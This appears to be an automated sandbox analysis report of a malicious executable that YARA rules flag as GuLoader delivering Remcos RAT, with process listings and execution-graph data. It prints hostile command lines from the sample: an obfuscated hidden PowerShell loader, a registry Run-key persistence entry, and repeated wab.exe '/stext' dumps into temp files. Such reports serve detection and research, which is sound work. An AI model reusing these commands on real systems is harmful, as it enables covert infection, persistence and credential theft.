                                                    2024-05-03 07:43:49 UTC1369INData Raw: 10 d0 b3 a2 95 4c 8d dd be ee 7d 62 ca e4 96 f4 ea 44 90 13 68 74 0a 05 0b 65 d2 58 62 09 64 3d e3 f4 17 0b fc 25 44 4e 99 a1 6d ce 0b 51 f3 ed a4 d5 0b 10 5e 45 15 67 56 a2 f4 7a 57 ef c6 5e de c3 7d 05 fd b9 e0 3c d2 08 7a 59 27 99 dd 6a fe f4 2d 88 b2 45 a8 41 b1 05 cb 9f fd 90 d5 15 cb 08 41 aa 5d bb 8e 3e 6e d1 af 35 79 8d 27 25 b9 16 08 6b 9a f8 46 b9 27 f3 da 0c 31 62 36 15 7b ad a8 a7 08 a4 8a cf cf 3f 19 af 46 81 c1 98 47 c4 6d 8d 0b 2d c6 dd 61 57 7e ed 49 ba 7e 09 3c 9e 01 8c 4d 87 40 ef 90 ae 66 78 d4 27 09 16 5a aa 9e 1f c4 70 fc 6c 95 20 13 91 ce df 05 20 06 97 00 8b 53 7a ce d2 19 91 0a da d2 81 14 c2 74 92 75 55 64 6e d8 12 e7 3d 7b 1c 15 a3 5d 29 1f 2c 4d b3 c5 70 f5 35 e5 c4 a6 7b a9 24 bf d6 99 ea 4f 2f 2b ac f5 75 55 83 73 54 03 52 d4
                                                    Data Ascii: L}bDhteXbd=%DNmQ^EgVzW^}<zY'j-EAA]>n5y'%kF'1b6{?FGm-aW~I~<M@fx'Zpl SztuUdn={]),Mp5{$O/+uUsTR



                                                    Target ID:0
                                                    Start time:09:42:54
                                                    Start date:03/05/2024
                                                    Path:C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"
                                                    Imagebase:0x400000
                                                    File size:501'952 bytes
                                                    MD5 hash:DA38292DF7F99C9CF99629E84D934BD6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:1
                                                    Start time:09:42:58
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc';$Brikvvningernes=$Respireredes.SubString(58067,3);.$Brikvvningernes($Respireredes)"
                                                    Imagebase:0xd40000
                                                    File size:433'152 bytes
                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2204905580.0000000009858000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:09:42:58
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:09:42:59
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
                                                    Imagebase:0x240000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:09:43:43
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:8
                                                    Start time:09:43:48
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"
                                                    Imagebase:0x240000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:09:43:48
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:09:43:48
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"
                                                    Imagebase:0xf90000
                                                    File size:59'392 bytes
                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:09:43:54
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sreexoebkgcaarsayfwsrzyyowbcnlfz"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:09:43:54
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtkx"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:09:43:54
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\fnphyzzx"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:18
                                                    Start time:09:43:56
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 12
                                                    Imagebase:0x770000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:19
                                                    Start time:09:43:57
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6672 -s 12
                                                    Imagebase:0x770000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:20
                                                    Start time:09:43:57
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 12
                                                    Imagebase:0x770000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:21
                                                    Start time:09:44:02
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xtjcxb"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:22
                                                    Start time:09:44:02
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hvonqtlzm"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:24
                                                    Start time:09:44:02
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sptgqmvszidsb"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:27
                                                    Start time:09:44:02
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5164 -s 12
                                                    Imagebase:0x770000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:28
                                                    Start time:09:44:09
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zaaaovlz"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:29
                                                    Start time:09:44:09
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\juftpowalcj"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:31
                                                    Start time:09:44:09
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mxslqghuzktmmh"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:34
                                                    Start time:09:44:17
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:35
                                                    Start time:09:44:17
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:36
                                                    Start time:09:44:17
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:37
                                                    Start time:09:44:17
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:38
                                                    Start time:09:44:17
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\owkrpbswynspxwny"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:40
                                                    Start time:09:44:17
                                                    Start date:03/05/2024
                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yyxcqtdymwkuzcbcqpf"
                                                    Imagebase:0x3e0000
                                                    File size:516'608 bytes
                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:43
                                                    Start time:09:44:17
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 12
                                                    Imagebase:0x770000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:44
                                                    Start time:09:44:17
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 12
                                                    Imagebase:0x770000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:45
                                                    Start time:09:44:17
                                                    Start date:03/05/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 12
                                                    Imagebase:0x770000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                      Execution Graph

                                                      Execution Coverage:20.4%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:16.8%
                                                      Total number of Nodes:1384
                                                      Total number of Limit Nodes:26
                                                      execution_graph: (node and edge data of the interactive execution graph rendering; not reproduced here)
3949 405aac 3948->3949 3952 405a60 3948->3952 3953 405a86 ShowWindow 3948->3953 3949->3946 3957 405aba SendMessageW 3949->3957 3955 405930 SendMessageW SendMessageW 3950->3955 3956 40594c 3950->3956 3958 4045da SendMessageW 3952->3958 3960 405aa6 3953->3960 3961 405a98 3953->3961 3959 405a7f 3954->3959 3955->3956 3962 405951 SendMessageW 3956->3962 3963 40595f 3956->3963 3957->3959 3964 405ad3 CreatePopupMenu 3957->3964 3958->3946 3966 4045da SendMessageW 3960->3966 3965 405707 28 API calls 3961->3965 3962->3963 3968 404601 22 API calls 3963->3968 3967 4066bf 21 API calls 3964->3967 3965->3960 3966->3949 3969 405ae3 AppendMenuW 3967->3969 3970 40596f 3968->3970 3971 405b00 GetWindowRect 3969->3971 3972 405b13 TrackPopupMenu 3969->3972 3973 405978 ShowWindow 3970->3973 3974 4059ac GetDlgItem SendMessageW 3970->3974 3971->3972 3972->3959 3975 405b2e 3972->3975 3976 40599b 3973->3976 3977 40598e ShowWindow 3973->3977 3974->3959 3978 4059d3 SendMessageW SendMessageW 3974->3978 3979 405b4a SendMessageW 3975->3979 3985 404636 SendMessageW 3976->3985 3977->3976 3978->3959 3979->3979 3980 405b67 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3979->3980 3982 405b8c SendMessageW 3980->3982 3982->3982 3983 405bb5 GlobalUnlock SetClipboardData CloseClipboard 3982->3983 3983->3959 3984->3945 3985->3974 3986->3948 4106 404e48 4107 404e74 4106->4107 4108 404e58 4106->4108 4110 404ea7 4107->4110 4111 404e7a SHGetPathFromIDListW 4107->4111 4117 405cc6 GetDlgItemTextW 4108->4117 4113 404e91 SendMessageW 4111->4113 4114 404e8a 4111->4114 4112 404e65 SendMessageW 4112->4107 4113->4110 4115 40140b 2 API calls 4114->4115 4115->4113 4117->4112 4118 401c48 4119 402d89 21 API calls 4118->4119 4120 401c4f 4119->4120 4121 402d89 21 API calls 4120->4121 4122 401c5c 4121->4122 4123 401c71 4122->4123 4124 402dab 21 API calls 4122->4124 4125 401c81 4123->4125 4126 402dab 21 API calls 4123->4126 4124->4123 4127 401cd8 4125->4127 4128 401c8c 4125->4128 4126->4125 4129 402dab 21 API calls 
4127->4129 4130 402d89 21 API calls 4128->4130 4131 401cdd 4129->4131 4132 401c91 4130->4132 4134 402dab 21 API calls 4131->4134 4133 402d89 21 API calls 4132->4133 4135 401c9d 4133->4135 4136 401ce6 FindWindowExW 4134->4136 4137 401cc8 SendMessageW 4135->4137 4138 401caa SendMessageTimeoutW 4135->4138 4139 401d08 4136->4139 4137->4139 4138->4139 4140 4028c9 4141 4028cf 4140->4141 4142 4028d7 FindClose 4141->4142 4143 402c2f 4141->4143 4142->4143 4147 4016d1 4148 402dab 21 API calls 4147->4148 4149 4016d7 GetFullPathNameW 4148->4149 4150 4016f1 4149->4150 4156 401713 4149->4156 4152 4069df 2 API calls 4150->4152 4150->4156 4151 401728 GetShortPathNameW 4153 402c2f 4151->4153 4154 401703 4152->4154 4154->4156 4157 406682 lstrcpynW 4154->4157 4156->4151 4156->4153 4157->4156 3390 401e53 GetDC 3398 402d89 3390->3398 3392 401e65 GetDeviceCaps MulDiv ReleaseDC 3393 402d89 21 API calls 3392->3393 3394 401e96 3393->3394 3395 4066bf 21 API calls 3394->3395 3396 401ed3 CreateFontIndirectW 3395->3396 3397 40263d 3396->3397 3399 4066bf 21 API calls 3398->3399 3400 402d9e 3399->3400 3400->3392 4158 402955 4159 402dab 21 API calls 4158->4159 4160 402961 4159->4160 4161 402977 4160->4161 4162 402dab 21 API calls 4160->4162 4163 40614d 2 API calls 4161->4163 4162->4161 4164 40297d 4163->4164 4186 406172 GetFileAttributesW CreateFileW 4164->4186 4166 40298a 4167 402a40 4166->4167 4168 4029a5 GlobalAlloc 4166->4168 4169 402a28 4166->4169 4170 402a47 DeleteFileW 4167->4170 4171 402a5a 4167->4171 4168->4169 4172 4029be 4168->4172 4173 403376 48 API calls 4169->4173 4170->4171 4187 4035fd SetFilePointer 4172->4187 4175 402a35 CloseHandle 4173->4175 4175->4167 4176 4029c4 4177 4035e7 ReadFile 4176->4177 4178 4029cd GlobalAlloc 4177->4178 4179 402a11 4178->4179 4180 4029dd 4178->4180 4181 406224 WriteFile 4179->4181 4182 403376 48 API calls 4180->4182 4183 402a1d GlobalFree 4181->4183 4185 4029ea 4182->4185 4183->4169 4184 402a08 GlobalFree 4184->4179 4185->4184 4186->4166 4187->4176 
4202 4014d7 4203 402d89 21 API calls 4202->4203 4204 4014dd Sleep 4203->4204 4206 402c2f 4204->4206 4207 40195b 4208 402dab 21 API calls 4207->4208 4209 401962 lstrlenW 4208->4209 4210 40263d 4209->4210 4218 4020dd 4219 4020ef 4218->4219 4220 4021a1 4218->4220 4221 402dab 21 API calls 4219->4221 4222 401423 28 API calls 4220->4222 4223 4020f6 4221->4223 4228 4022fb 4222->4228 4224 402dab 21 API calls 4223->4224 4225 4020ff 4224->4225 4226 402115 LoadLibraryExW 4225->4226 4227 402107 GetModuleHandleW 4225->4227 4226->4220 4229 402126 4226->4229 4227->4226 4227->4229 4238 406ae5 4229->4238 4232 402170 4234 405707 28 API calls 4232->4234 4233 402137 4235 401423 28 API calls 4233->4235 4236 402147 4233->4236 4234->4236 4235->4236 4236->4228 4237 402193 FreeLibrary 4236->4237 4237->4228 4243 4066a4 WideCharToMultiByte 4238->4243 4240 406b02 4241 406b09 GetProcAddress 4240->4241 4242 402131 4240->4242 4241->4242 4242->4232 4242->4233 4243->4240 4244 402b5e 4245 402bb0 4244->4245 4246 402b65 4244->4246 4247 406a76 5 API calls 4245->4247 4249 402d89 21 API calls 4246->4249 4250 402bae 4246->4250 4248 402bb7 4247->4248 4251 402dab 21 API calls 4248->4251 4252 402b73 4249->4252 4253 402bc0 4251->4253 4254 402d89 21 API calls 4252->4254 4253->4250 4255 402bc4 IIDFromString 4253->4255 4257 402b7f 4254->4257 4255->4250 4256 402bd3 4255->4256 4256->4250 4262 406682 lstrcpynW 4256->4262 4261 4065c9 wsprintfW 4257->4261 4259 402bf0 CoTaskMemFree 4259->4250 4261->4250 4262->4259 4263 402a60 4264 402d89 21 API calls 4263->4264 4265 402a66 4264->4265 4266 402aa9 4265->4266 4267 402a8d 4265->4267 4275 402933 4265->4275 4268 402ac3 4266->4268 4269 402ab3 4266->4269 4270 402a92 4267->4270 4271 402aa3 4267->4271 4273 4066bf 21 API calls 4268->4273 4272 402d89 21 API calls 4269->4272 4277 406682 lstrcpynW 4270->4277 4271->4275 4278 4065c9 wsprintfW 4271->4278 4272->4271 4273->4271 4277->4275 4278->4275 4279 401761 4280 402dab 21 API calls 4279->4280 4281 401768 4280->4281 4282 4061a1 2 
API calls 4281->4282 4283 40176f 4282->4283 4283->4283 4284 401d62 4285 402d89 21 API calls 4284->4285 4286 401d73 SetWindowLongW 4285->4286 4287 402c2f 4286->4287 4288 4028e3 4289 4028eb 4288->4289 4290 4028ef FindNextFileW 4289->4290 4292 402901 4289->4292 4291 402948 4290->4291 4290->4292 4294 406682 lstrcpynW 4291->4294 4294->4292 4295 401568 4296 402ba9 4295->4296 4299 4065c9 wsprintfW 4296->4299 4298 402bae 4299->4298 4307 40196d 4308 402d89 21 API calls 4307->4308 4309 401974 4308->4309 4310 402d89 21 API calls 4309->4310 4311 401981 4310->4311 4312 402dab 21 API calls 4311->4312 4313 401998 lstrlenW 4312->4313 4315 4019a9 4313->4315 4314 4019ea 4315->4314 4319 406682 lstrcpynW 4315->4319 4317 4019da 4317->4314 4318 4019df lstrlenW 4317->4318 4318->4314 4319->4317 4320 40506e GetDlgItem GetDlgItem 4321 4050c0 7 API calls 4320->4321 4333 4052e5 4320->4333 4322 405167 DeleteObject 4321->4322 4323 40515a SendMessageW 4321->4323 4324 405170 4322->4324 4323->4322 4326 4051a7 4324->4326 4328 4066bf 21 API calls 4324->4328 4325 4053c7 4327 405473 4325->4327 4336 405420 SendMessageW 4325->4336 4359 4052d8 4325->4359 4329 404601 22 API calls 4326->4329 4331 405485 4327->4331 4332 40547d SendMessageW 4327->4332 4334 405189 SendMessageW SendMessageW 4328->4334 4330 4051bb 4329->4330 4335 404601 22 API calls 4330->4335 4339 4054ae 4331->4339 4345 405497 ImageList_Destroy 4331->4345 4346 40549e 4331->4346 4332->4331 4333->4325 4363 405354 4333->4363 4374 404fbc SendMessageW 4333->4374 4334->4324 4341 4051cc 4335->4341 4343 405435 SendMessageW 4336->4343 4336->4359 4337 4053b9 SendMessageW 4337->4325 4338 404668 8 API calls 4344 405674 4338->4344 4342 405628 4339->4342 4367 4054e9 4339->4367 4379 40503c 4339->4379 4348 4052a7 GetWindowLongW SetWindowLongW 4341->4348 4355 40521f SendMessageW 4341->4355 4357 4052a2 4341->4357 4360 405271 SendMessageW 4341->4360 4361 40525d SendMessageW 4341->4361 4349 40563a ShowWindow GetDlgItem ShowWindow 4342->4349 4342->4359 4351 405448 
